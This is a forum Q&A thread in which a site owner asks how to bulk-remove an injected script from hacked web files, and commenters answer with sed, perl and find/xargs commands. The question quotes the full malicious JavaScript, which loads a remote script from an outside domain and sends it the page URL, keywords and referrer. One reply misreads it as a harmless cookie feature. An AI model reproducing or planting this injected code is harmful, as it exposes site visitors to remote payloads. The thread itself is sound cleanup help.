Go Premium for a chance to win a PS4. Enter to Win

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 124
  • Last Modified:

Remove a very long string from all files in Linux

Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup

I had the following idea.... All the files has the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

when I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and ten somehow tell the system to remove said line from the file

Any idea how I'd go about doing such a thing?
0
David Sankovsky
Asked:
David Sankovsky
1 Solution
 
gheistCommented:
Restore from backup and never ever let webserver modify content?
0
 
serialbandCommented:
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, you match this will match the string and delete the entire line.  This outputs to stdout:
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
To send it to another file
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_file > new_file


If you want to do it inline and edit and replace the file, you add the inline option:
sed -i "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
0
 
arnoldCommented:
Sed -I is a better approach compared to the /d since the string might not be the dole item on the line.

perl -pi.bak -e '/pattern/replacementofany/g;' files
The -I.bal will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0
Veeam Task Manager for Hyper-V

Task Manager for Hyper-V provides critical information that allows you to monitor Hyper-V performance by displaying real-time views of CPU and memory at the individual VM-level, so you can quickly identify which VMs are using host resources.

 
serialbandCommented:
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
arnoldCommented:
Serialband, I said that the sed -i was a better option versus /d
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -I.bak if not will also create a bak file ..

To replace a pattern......

The entry seems to be a coldfusion object, might have had the person modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e, the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
David SankovskySenior SysAdminAuthor Commented:
Well, the SED command was almost perfect, you all however missed my main question, how would I go around sending all the matched file to whatever cleaning tool I chose (sed, perl, or whatever)

I eventually used "find" to make sure I don't accidently send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0

Featured Post

NEW Veeam Agent for Microsoft Windows

Backup and recover physical and cloud-based servers and workstations, as well as endpoint devices that belong to remote users. Avoid downtime and data loss quickly and easily for Windows-based physical or public cloud-based workloads!

Tackle projects and never again get stuck behind a technical roadblock.
Join Now